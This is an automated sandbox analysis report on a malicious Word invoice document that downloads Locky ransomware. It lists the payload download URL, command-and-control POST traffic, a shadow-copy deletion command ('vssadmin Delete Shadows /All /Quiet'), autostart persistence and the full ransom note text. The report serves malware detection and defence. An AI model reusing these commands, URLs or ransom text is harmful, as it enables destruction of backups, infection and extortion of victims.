Analysis Report

Overview

General Information

Analysis ID:	103312
Start time:	12:52:15
Start date:	17/02/2016
Overall analysis duration:	0h 4m 34s
Report type:	full
Sample file name:	invoice_J-98148270.doc
Cookbook file name:	defaultwindowsdocumentcookbook.jbs
Analysis system description:	Windows 7 (Office 2003 SP1, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 41, Firefox 36)
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	2
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled
Detection:	MAL
Classification:	mal88.evad.expl.rans.winDOC@6/46@8/6
HCA Informations:	Success: true, ratio: 98% Number of executed functions: 44 Number of non-executed functions: 35
EGA Information:	Success: true, ratio: 50%
Cookbook Comments:	Found application associated with file extension: .doc Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): spsys.sys, VSSVC.exe, asyncmac.sys, WmiApSrv.exe, conhost.exe, WMIADAP.exe, dllhost.exe Execution Graph export aborted for target WINWORD.EXE, PID 2580 because there are no executed function Report size exceeded maximum capacity and may have missing behavior information.

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	88	0 - 100	Report FP / FN

Classification

Analysis Advice

Sample sleeps for a long time, analyze it with the fake sleep cookbook

Signature Overview

Click to jump to signature section

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Show sources

Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_2_00406F53 CryptAcquireContextA,CryptReleaseContext,CryptReleaseContext,CryptDestroyHash,EnterCriticalSection,LeaveCriticalSection,CryptGenRandom,GetLastError,Sleep,EnterCriticalSection,LeaveCriticalSection,CryptDestroyHash,EnterCriticalSection,LeaveCriticalSection,	3_2_00406F53
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_2_004014FF GetFileAttributesExW,GetLastError,SetFileAttributesW,CloseHandle,MoveFileExW,GetLastError,CloseHandle,CreateFileW,CloseHandle,CryptGenRandom,GetLastError,CryptEncrypt,GetLastError,GetSystemTimeAsFileTime,CloseHandle,SetFileAttributesW,CloseHandle,GetLastError,	3_2_004014FF
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_2_00402808 CryptAcquireContextA,CryptReleaseContext,	3_2_00402808
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_2_00405FF4 CryptAcquireContextA,CryptDestroyHash,CryptReleaseContext,	3_2_00405FF4
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_2_004028F3 CryptDestroyKey,CryptReleaseContext,	3_2_004028F3
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_2_004065C7 CryptCreateHash,GetLastError,	3_2_004065C7
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_2_0040102A CryptSetKeyParam,GetLastError,	3_2_0040102A
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_2_004027BD CryptReleaseContext,	3_2_004027BD
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_2_004012D0 CryptDestroyKey,	3_2_004012D0
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_2_004065B9 CryptDestroyHash,	3_2_004065B9
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_2_00402C97 CryptDestroyKey,CryptReleaseContext,	3_2_00402C97
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_2_00401000 CryptDestroyKey,	3_2_00401000
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_2_00406607 CryptGetHashParam,GetLastError,	3_2_00406607
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_2_0040F7F4 CryptReleaseContext,	3_2_0040F7F4
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_2_004064BE CryptHashData,GetLastError,	3_2_004064BE
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_2_004010F1 CryptEncrypt,GetLastError,	3_2_004010F1
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_2_0040121F CryptDestroyKey,CryptImportKey,GetLastError,	3_2_0040121F
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_2_00401BE3 CryptGenRandom,GetLastError,	3_2_00401BE3
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_2_004027DA CryptReleaseContext,	3_2_004027DA
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_2_00405FF4 CryptAcquireContextA,CryptDestroyHash,CryptReleaseContext,	3_2_00405FF4
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_1_00405D1F RegisterWindowMessageA,OffsetRect,GetWindowThreadProcessId,GetClassInfoExW,ShowWindow,GetSidSubAuthority,GetKeyboardLayout,GetClassInfoW,FindFirstFileW,LoadCursorA,RegLoadKeyA,FillRect,LoadMenuA,RegQueryValueA,mouse_event,RegCloseKey,GetKernelObjectSecurity,ModifyMenuW,RegDeleteKeyA,RegSetValueExA,GetSidSubAuthorityCount,RegQueryInfoKeyA,InvalidateRgn,GetMenuItemID,RegisterEventSourceA,IsIconic,GetSecurityDescriptorDacl,DispatchMessageW,GetCursorPos,CharPrevA,SendDlgItemMessageW,GetAclInformation,ModifyMenuA,wvsprintfA,IsWindowVisible,GetLongPathNameA,GetLongPathNameA,CharLowerW,RegSetValueA,GetSidLengthRequired,GetCaretPos,GetClassNameA,CloseClipboard,SetClipboardData,LoadCursorFromFileW,InitializeAcl,DialogBoxIndirectParamA,IntersectRect,InitializeSecurityDescriptor,TrackPopupMenu,GetProcessWindowStation,RegFlushKey,MakeSelfRelativeSD,ShowCaret,SetSecurityDescriptorSacl,GetUserNameW,OpenEventLogW,CreateDesktopW,TranslateMDISysAccel,GetParent,ClientToScreen,CreateDialogIndirectParamW,GrayStringW,	3_1_00405D1F
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Code function: 3_1_00403139 SendDlgItemMessageW,GetAclInformation,ModifyMenuA,wvsprintfA,CloseClipboard,LoadCursorFromFileW,DialogBoxIndirectParamA,IntersectRect,InitializeSecurityDescriptor,TrackPopupMenu,RegFlushKey,MakeSelfRelativeSD,GetUserNameW,IsWow64Process,CreateDialogIndirectParamW,GrayStringW,FindWindowW,InSendMessage,OpenClipboard,AddAce,IsWindow,DrawStateA,RegCreateKeyExW,GetLastActivePopup,DialogBoxParamA,PostThreadMessageW,RegOpenKeyExA,GetWindowWord,IsDialogMessageA,DrawIconEx,MakeAbsoluteSD,RegSetValueW,LoadMenuW,GetMenuState,DrawTextExA,GetScrollPos,GetDlgItem,GetClipboardFormatNameW,InitiateSystemShutdownA,ValidateRgn,LookupPrivilegeValueA,ShowWindow,RegLoadKeyA,FillRect,LoadMenuA,GetKernelObjectSecurity,ModifyMenuW,RegSetValueExA,RegQueryInfoKeyA,InvalidateRgn,GetMenuItemID,RegisterEventSourceA,IsIconic,DispatchMessageW,GetCursorPos,CharPrevA,SendDlgItemMessageW,GetAclInformation,ModifyMenuA,wvsprintfA,GetClassNameA,CloseClipboard,SetClipboardData,InitializeAcl,DialogBoxIndirectParamA,MakeSelfRelativeSD,Sh	3_1_00403139

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)

Show sources

Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe

Code function: 3_2_0040121F CryptDestroyKey,CryptImportKey,GetLastError,

3_2_0040121F

Deletes shadow drive data (may be related to ransomware)

Show sources

Source: ladybi.exe	Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
Source: ladybi.exe	Binary or memory string: 1195.64.154.14\_Locky_recover_instructions.txt&length=&failed=&encrypted=&act=stats&path=id=&act=report&data=Windows 2000Windows XPWindows 2003Windows 2003 R2Windows VistaWindows Server 2008Windows 7Windows Server 2008 R2Windows 8Windows Server 2012Windows 8.1Windows Server 2012 R2Windows 10Windows Server 2016 Technical Previewunknown&x64=&sp=&os=&serv=&corp=&lang=&act=getkey&affid=Tahoma\_Locky_recover_instructions.bmpControl Panel\Desktop0WallpaperStyleTileWallpaperopenSoftware\Lockyidpubkeypaytextcompletedsvchost.exe:Zone.Identifier&act=gettext&lang=vssadmin.exe Delete Shadows /All /QuietSoftware\Microsoft\Windows\CurrentVersion\RunLockyLocky/\.0123456789ABCDEFWow64DisableWow64FsRedirectionkernel32.dllIsWow64Processsyscmd.exe /C del /Q /F "HTTP/1.1rupweuinytpmusfrdeitbeuknltf/main.phphttp://POST
Source: vssadmin.exe	Binary or memory string: Example Usage: vssadmin Delete ShadowStorage
Source: vssadmin.exe	Binary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C:
Source: vssadmin.exe	Binary or memory string: vssadmin Delete Shadows
Source: vssadmin.exe	Binary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest
Source: vssadmin.exe	Binary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D:
Source: vssadmin.exe	Binary or memory string: o#(o#8o#Bo#vssadmin.exeDeleteShadows/All/Quiet
Source: vssadmin.exe	Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
Source: vssadmin.exe	Binary or memory string: C:\C:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\Program Files\Microsoft Office\OFFICE11\;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /QuietC:\Windows\system32\vssadmin.exeWinsta0\Default%
Source: vssadmin.exe	Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet"

Writes a notice file (html or txt) to demand a ransom

Show sources

Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	File dropped: C:\_Locky_recover_instructions.txt -> !!! important information !!!!all of your files are encrypted with rsa-2048 and aes-128 ciphers.more information about the rsa and aes can be found here: http://en.wikipedia.org/wiki/rsa_(cryptosystem) http://en.wikipedia.org/wiki/advanced_encryption_standard decrypting of your files is only possible with the private key and decrypt program, which is on our secret server.to receive your private key follow one of the links: 1. http://6dtxgqam4crv6rr6.tor2web.org/21e41bf2adfa19bb 2. http://6dtxgqam4crv6rr6.onion.to/21e41bf2adfa19bb 3. http://6dtxgqam4crv6rr6.onion.cab/21e41bf2adfa19bb 4. http://6dtxgqam4crv6rr6.onion.link/21e41bf2adfa19bbif all of this addresses are not available, follow these steps: 1. download and install tor browser: https://www.torproject.org/download/download-easy.html 2. after a successful installation, run the browser and wait for initialization. 3. type in the address bar:
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	File dropped: C:\Users\admin\Documents\ProcessExplorer[1]\_Locky_recover_instructions.txt -> !!! important information !!!!all of your files are encrypted with rsa-2048 and aes-128 ciphers.more information about the rsa and aes can be found here: http://en.wikipedia.org/wiki/rsa_(cryptosystem) http://en.wikipedia.org/wiki/advanced_encryption_standard decrypting of your files is only possible with the private key and decrypt program, which is on our secret server.to receive your private key follow one of the links: 1. http://6dtxgqam4crv6rr6.tor2web.org/21e41bf2adfa19bb 2. http://6dtxgqam4crv6rr6.onion.to/21e41bf2adfa19bb 3. http://6dtxgqam4crv6rr6.onion.cab/21e41bf2adfa19bb 4. http://6dtxgqam4crv6rr6.onion.link/21e41bf2adfa19bbif all of this addresses are not available, follow these steps: 1. download and install tor browser: https://www.torproject.org/download/download-easy.html 2. after a successful installation, run the browser and wait for initial
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	File dropped: C:\Users\Public\Pictures\Sample Pictures\_Locky_recover_instructions.txt -> !!! important information !!!!all of your files are encrypted with rsa-2048 and aes-128 ciphers.more information about the rsa and aes can be found here: http://en.wikipedia.org/wiki/rsa_(cryptosystem) http://en.wikipedia.org/wiki/advanced_encryption_standard decrypting of your files is only possible with the private key and decrypt program, which is on our secret server.to receive your private key follow one of the links: 1. http://6dtxgqam4crv6rr6.tor2web.org/21e41bf2adfa19bb 2. http://6dtxgqam4crv6rr6.onion.to/21e41bf2adfa19bb 3. http://6dtxgqam4crv6rr6.onion.cab/21e41bf2adfa19bb 4. http://6dtxgqam4crv6rr6.onion.link/21e41bf2adfa19bbif all of this addresses are not available, follow these steps: 1. download and install tor browser: https://www.torproject.org/download/download-easy.html 2. after a successful installation, run the browser and wait for initializa
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	File dropped: C:\Users\Public\Music\Sample Music\_Locky_recover_instructions.txt -> !!! important information !!!!all of your files are encrypted with rsa-2048 and aes-128 ciphers.more information about the rsa and aes can be found here: http://en.wikipedia.org/wiki/rsa_(cryptosystem) http://en.wikipedia.org/wiki/advanced_encryption_standard decrypting of your files is only possible with the private key and decrypt program, which is on our secret server.to receive your private key follow one of the links: 1. http://6dtxgqam4crv6rr6.tor2web.org/21e41bf2adfa19bb 2. http://6dtxgqam4crv6rr6.onion.to/21e41bf2adfa19bb 3. http://6dtxgqam4crv6rr6.onion.cab/21e41bf2adfa19bb 4. http://6dtxgqam4crv6rr6.onion.link/21e41bf2adfa19bbif all of this addresses are not available, follow these steps: 1. download and install tor browser: https://www.torproject.org/download/download-easy.html 2. after a successful installation, run the browser and wait for initialization.
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	File dropped: C:\Users\Public\Videos\Sample Videos\_Locky_recover_instructions.txt -> !!! important information !!!!all of your files are encrypted with rsa-2048 and aes-128 ciphers.more information about the rsa and aes can be found here: http://en.wikipedia.org/wiki/rsa_(cryptosystem) http://en.wikipedia.org/wiki/advanced_encryption_standard decrypting of your files is only possible with the private key and decrypt program, which is on our secret server.to receive your private key follow one of the links: 1. http://6dtxgqam4crv6rr6.tor2web.org/21e41bf2adfa19bb 2. http://6dtxgqam4crv6rr6.onion.to/21e41bf2adfa19bb 3. http://6dtxgqam4crv6rr6.onion.cab/21e41bf2adfa19bb 4. http://6dtxgqam4crv6rr6.onion.link/21e41bf2adfa19bbif all of this addresses are not available, follow these steps: 1. download and install tor browser: https://www.torproject.org/download/download-easy.html 2. after a successful installation, run the browser and wait for initialization

Protection of GUI:

Contains functionality to create a new desktop

Show sources

Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe

Code function: 3_1_00405D1F RegisterWindowMessageA,OffsetRect,GetWindowThreadProcessId,GetClassInfoExW,ShowWindow,GetSidSubAuthority,GetKeyboardLayout,GetClassInfoW,FindFirstFileW,LoadCursorA,RegLoadKeyA,FillRect,LoadMenuA,RegQueryValueA,mouse_event,RegCloseKey,GetKernelObjectSecurity,ModifyMenuW,RegDeleteKeyA,RegSetValueExA,GetSidSubAuthorityCount,RegQueryInfoKeyA,InvalidateRgn,GetMenuItemID,RegisterEventSourceA,IsIconic,GetSecurityDescriptorDacl,DispatchMessageW,GetCursorPos,CharPrevA,SendDlgItemMessageW,GetAclInformation,ModifyMenuA,wvsprintfA,IsWindowVisible,GetLongPathNameA,GetLongPathNameA,CharLowerW,RegSetValueA,GetSidLengthRequired,GetCaretPos,GetClassNameA,CloseClipboard,SetClipboardData,LoadCursorFromFileW,InitializeAcl,DialogBoxIndirectParamA,IntersectRect,InitializeSecurityDescriptor,TrackPopupMenu,GetProcessWindowStation,RegFlushKey,MakeSelfRelativeSD,ShowCaret,SetSecurityDescriptorSacl,GetUserNameW,OpenEventLogW,CreateDesktopW,TranslateMDISysAccel,GetParent,ClientToScreen,CreateDialogIndirectParamW,GrayStringW,

3_1_00405D1F

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard

Show sources

Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe

3_1_00405D1F

Software Vulnerablities:

Potential document exploit detected (Application instantly terminates)

Show sources

Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE

Process terminated: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE

Potential document exploit detected (performs DNS queries)

Show sources

Source: global traffic

DNS query: name: www.jesusdenazaret.com.ve

Potential document exploit detected (performs HTTP gets)

Show sources

Source: global traffic

TCP traffic: 192.168.1.12:49177 -> 190.9.32.8:80

Potential document exploit detected (unknown TCP traffic)

Show sources

Source: global traffic

TCP traffic: 192.168.1.12:49177 -> 190.9.32.8:80

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE

Process created: C:\Users\admin\AppData\Local\Temp\ladybi.exe

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE

File created: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LUGXQY9O\r34f3345g[1].exe

Document exploit detected (dops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE

File created: r34f3345g[1].exe.2580.dr

Networking:

Urls found in memory or binary data

Show sources

Source: WINWORD.EXE	String found in binary or memory: file:///c:
Source: WINWORD.EXE	String found in binary or memory: file:///c:/users/admin/appdata/local/temp/ladybi.exe
Source: WINWORD.EXE	String found in binary or memory: file:///c:/users/admin/appdata/local/temp/ladybi.exe$
Source: WINWORD.EXE	String found in binary or memory: file:///c:/users/admin/appdata/local/temp/ladybi.exey
Source: WINWORD.EXE	String found in binary or memory: file://page
Source: WINWORD.EXE, ladybi.exe	String found in binary or memory: http://
Source: WINWORD.EXE	String found in binary or memory: http://)file
Source: WINWORD.EXE	String found in binary or memory: http://)web
Source: ladybi.exe, _Locky_recover_instructions.txt2.936.dr, _Locky_recover_instructions.txt1.936.dr, _Locky_recover_instructions.txt.936.dr, _Locky_recover_instructions.txt0.936.dr, _Locky_recover_instructions.txt3.936.dr	String found in binary or memory: http://6dtxgqam4crv6rr6.onion.cab/21e41bf2adfa19bb
Source: ladybi.exe, _Locky_recover_instructions.txt2.936.dr, _Locky_recover_instructions.txt1.936.dr, _Locky_recover_instructions.txt.936.dr, _Locky_recover_instructions.txt0.936.dr, _Locky_recover_instructions.txt3.936.dr	String found in binary or memory: http://6dtxgqam4crv6rr6.onion.link/21e41bf2adfa19bb
Source: ladybi.exe, _Locky_recover_instructions.txt2.936.dr, _Locky_recover_instructions.txt1.936.dr, _Locky_recover_instructions.txt.936.dr, _Locky_recover_instructions.txt0.936.dr, _Locky_recover_instructions.txt3.936.dr	String found in binary or memory: http://6dtxgqam4crv6rr6.onion.to/21e41bf2adfa19bb
Source: ladybi.exe, _Locky_recover_instructions.txt2.936.dr, _Locky_recover_instructions.txt1.936.dr, _Locky_recover_instructions.txt.936.dr, _Locky_recover_instructions.txt0.936.dr, _Locky_recover_instructions.txt3.936.dr	String found in binary or memory: http://6dtxgqam4crv6rr6.tor2web.org/21e41bf2adfa19bb
Source: WINWORD.EXE	String found in binary or memory: http://crl.microsoft.com/pki/crl/products/codesignpca.crl0
Source: WINWORD.EXE	String found in binary or memory: http://crl.verisign.com/thawtetimestampingca.crl0
Source: WINWORD.EXE	String found in binary or memory: http://crl.verisign.com/tss-ca.crl0
Source: ladybi.exe	String found in binary or memory: http://dkoipg.pw/main.php
Source: ladybi.exe, _Locky_recover_instructions.txt2.936.dr, _Locky_recover_instructions.txt1.936.dr, _Locky_recover_instructions.txt.936.dr, _Locky_recover_instructions.txt0.936.dr, _Locky_recover_instructions.txt3.936.dr	String found in binary or memory: http://en.wikipedia.org/wiki/advanced_encryption_standard
Source: ladybi.exe, _Locky_recover_instructions.txt2.936.dr, _Locky_recover_instructions.txt1.936.dr, _Locky_recover_instructions.txt.936.dr, _Locky_recover_instructions.txt0.936.dr, _Locky_recover_instructions.txt3.936.dr	String found in binary or memory: http://en.wikipedia.org/wiki/rsa_(cryptosystem)
Source: WINWORD.EXE	String found in binary or memory: http://freebusy.office.microsoft.com/freebusy/freebusy.dll?prd=office&pver=
Source: WINWORD.EXE	String found in binary or memory: http://ftp://mailto:gopher://
Source: WINWORD.EXE	String found in binary or memory: http://go.microsoft.com/fwlink/?linkid=125824-http://go.microsoft.com/fwlink/?linkid=125723-http://g
Source: WINWORD.EXE	String found in binary or memory: http://go.microsoft.com/fwlink/?linkid=92362.
Source: WINWORD.EXE	String found in binary or memory: http://msdn.microsoft.com/developer/default.htm
Source: WINWORD.EXE	String found in binary or memory: http://myserver/myfolder)the
Source: WINWORD.EXE	String found in binary or memory: http://myserver/myfolder/newsitename)select
Source: WINWORD.EXE	String found in binary or memory: http://myserver/public/.
Source: WINWORD.EXE	String found in binary or memory: http://myserver/public/.cannot
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.verisign.com0
Source: WINWORD.EXE	String found in binary or memory: http://office.microsoft.com
Source: WINWORD.EXE	String found in binary or memory: http://office.microsoft.comspeech
Source: WINWORD.EXE	String found in binary or memory: http://officeupdate.microsoft.com
Source: ladybi.exe	String found in binary or memory: http://post
Source: WINWORD.EXE	String found in binary or memory: http://r.office.microsoft.com/r/rlidnetworkplaces?clid=1033&app=office10&select=noo
Source: invoice_J-98148270.doc, theme1.xml	String found in binary or memory: http://schemas.openxmlformats.org/drawingml/2006/main
Source: WINWORD.EXE	String found in binary or memory: http://support.microsoft.com/support/misc/kblookup.asp?id=q302596
Source: WINWORD.EXE	String found in binary or memory: http://support.microsoft.com/support/misc/kblookup.asp?id=q302596pad
Source: WINWORD.EXE	String found in binary or memory: http://www.jesusdenazaret.com.ve/34gf5y/r34f3345g.exe
Source: WINWORD.EXE	String found in binary or memory: http://www.jesusdenazaret.com.ve/34gf5y/r34f3345g.exe8
Source: WINWORD.EXE	String found in binary or memory: http://www.microsoft.com
Source: WINWORD.EXE	String found in binary or memory: http://www.microsoft.com.windows
Source: WINWORD.EXE	String found in binary or memory: http://www.microsoft.com/isapi/redir.dll?prd=&sbp=&plcid=&pver=&os=&over=&olcid=&clcid=&ar=&sba=&o1=
Source: WINWORD.EXE	String found in binary or memory: http://www.microsoft.com/netmeeting/.
Source: WINWORD.EXE	String found in binary or memory: http://www.officenet.net/
Source: ladybi.exe, _Locky_recover_instructions.txt2.936.dr, _Locky_recover_instructions.txt1.936.dr, _Locky_recover_instructions.txt.936.dr, _Locky_recover_instructions.txt0.936.dr, _Locky_recover_instructions.txt3.936.dr	String found in binary or memory: https://www.torproject.org/download/download-easy.html

Contains functionality to download additional files from the internet

Show sources

Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe

Code function: 3_2_004068F1 InternetOpenA,GetLastError,InternetCloseHandle,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,HttpOpenRequestA,GetLastError,InternetQueryOptionA,InternetSetOptionA,InternetSetOptionA,InternetWriteFile,HttpEndRequestA,GetLastError,GetLastError,HttpSendRequestA,GetLastError,HttpQueryInfoA,InternetReadFile,GetLastError,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

3_2_004068F1

Downloads files

Show sources

Source: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE

File created: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LUGXQY9O\r34f3345g[1].exe

Downloads files from webservers via HTTP

Show sources

Source: global traffic

HTTP traffic detected: GET /34gf5y/r34f3345g.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C) Host: www.jesusdenazaret.com.ve Connection: Keep-Alive

Found strings which match to known social media urls

Show sources

Source: WINWORD.EXE

String found in binary or memory: yahoo.com equals www.yahoo.com (Yahoo)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: www.jesusdenazaret.com.ve

Posts data to webserver

Show sources

Source: unknown

HTTP traffic detected: POST /main.php HTTP/1.1 Host: dkoipg.pw Content-Length: 100 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 9f 29 9f 5b 6b 15 c9 9f ba 53 d7 f9 e0 d5 4d 16 9a 66 37 ac 55 cc bb 2d a7 4f bd 1d 41 7f 97 01 cb 42 4d b2 19 b4 f1 4c a0 05 ff 35 21 e0 a1 79 81 6e 66 f8 58 38 e9 d0 d4 4f fc eb 25 f5 a3 fa 4a 9f 86 2f 03 ac d3 88 93 0d 2b 80 d5 2d 99 13 2b ac 87 0b f3 82 c2 a8 9d 08 ef 25 3c 8a 30 28 f7 ad 79 02 Data Ascii: )[kSMf7U-OABML5!ynfX8O%J/+-+%<0(y

Downloads executable code via HTTP

Show sources

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OK Date: Wed, 17 Feb 2016 11:54:06 GMT Server: Apache Last-Modified: Thu, 01 Jun 2006 03:13:36 GMT Accept-Ranges: bytes Content-Length: 184320 Connection: close Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 de 52 0e 8b 9a 33 60 d8 9a 33 60 d8 9a 33 60 d8 72 2c 6a d8 c3 33 60 d8 19 2f 6e d8 9b 33 60 d8 72 2c 64 d8 8b 33 60 d8 9a 33 61 d8 02 33 60 d8 f8 2c 73 d8 a7 33 60 d8 9a 33 60 d8 9b 33 60 d8 72 2c 6b d8 9b 33 60 d8 22 35 66 d8 9b 33 60 d8 52 69 63 68 9a 33 60 d8 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 17 3e b6 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 c0 00 00 00 40 3c 00 00 00 00 00 dc c0 00 0

HTTP GET or POST without a user agent

Show sources

Source: global traffic	HTTP traffic detected: POST /main.php HTTP/1.1 Host: dkoipg.pw Content-Length: 100 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 9f 29 9f 5b 6b 15 c9 9f ba 53 d7 f9 e0 d5 4d 16 9a 66 37 ac 55 cc bb 2d a7 4f bd 1d 41 7f 97 01 cb 42 4d b2 19 b4 f1 4c a0 05 ff 35 21 e0 a1 79 81 6e 66 f8 58 38 e9 d0 d4 4f fc eb 25 f5 a3 fa 4a 9f 86 2f 03 ac d3 88 93 0d 2b 80 d5 2d 99 13 2b ac 87 0b f3 82 c2 a8 9d 08 ef 25 3c 8a 30 28 f7 ad 79 02 Data Ascii: )[kSMf7U-OABML5!ynfX8O%J/+-+%<0(y
Source: global traffic	HTTP traffic detected: POST /main.php HTTP/1.1 Host: dkoipg.pw Content-Length: 55 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 1d f6 7c e4 b1 57 05 63 19 96 e8 01 f6 d3 8f 63 46 08 00 b7 d8 0a 58 dc df f3 63 72 f6 a4 7b 77 f6 d0 04 96 2b 8d 65 16 05 f7 66 66 c7 12 8a 02 15 a6 06 48 01 c0 f7 Data Ascii: \|WccFXcr{w+effH
Source: global traffic	HTTP traffic detected: POST /main.php HTTP/1.1 Host: dkoipg.pw Content-Length: 93 Connection: Keep-Alive Cache-Control: no-cache Data Raw: f9 55 c6 01 49 8b 60 82 ab cb 5e 7d ad 6e 0e 25 69 9f cb d2 ea 13 54 da dc 72 a3 12 45 fd d4 a1 9a 6a 51 af 04 bb f0 4c b4 f4 6a ca 07 a7 7b 3f b0 71 3a 7b 02 1b 9e 92 d4 cd b9 04 e9 03 85 c7 dd 99 6c 9a e8 27 ac 9a 1a 05 ef 63 f4 ff 4b 2d 21 bb 11 c1 42 30 f0 8a 86 16 aa e0 f2 Data Ascii: UI`^}n%iTrEjQLj{?q:{l'cK-!B0
Source: global traffic	HTTP traffic detected: POST /main.php HTTP/1.1 Host: dkoipg.pw Content-Length: 992 Connection: Keep-Alive Cache-Control: no-cache

Uses a known web browser user agent for HTTP communication

Show sources

Source: global traffic

Boot Survival:

Creates an autostart registry key

Show sources

Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run Locky
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run Locky

Stealing of Sensitive Information:

Searches for user specific document files

Show sources

Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Key value created or modified: C:\Users\admin\Documents
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Key value created or modified: C:\Users\admin\Documents
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Key value created or modified: C:\Users\admin\Documents\ProcessExplorer[1]
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Key value created or modified: C:\Users\admin\Documents\ProcessExplorer[1]
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Key value created or modified: C:\Users\Public\Documents
Source: C:\Users\admin\AppData\Local\Temp\ladybi.exe	Key value created or modified: C:\Users\Public\Documents

Persistence and Installation Behavior:

Drops PE files

Show sources

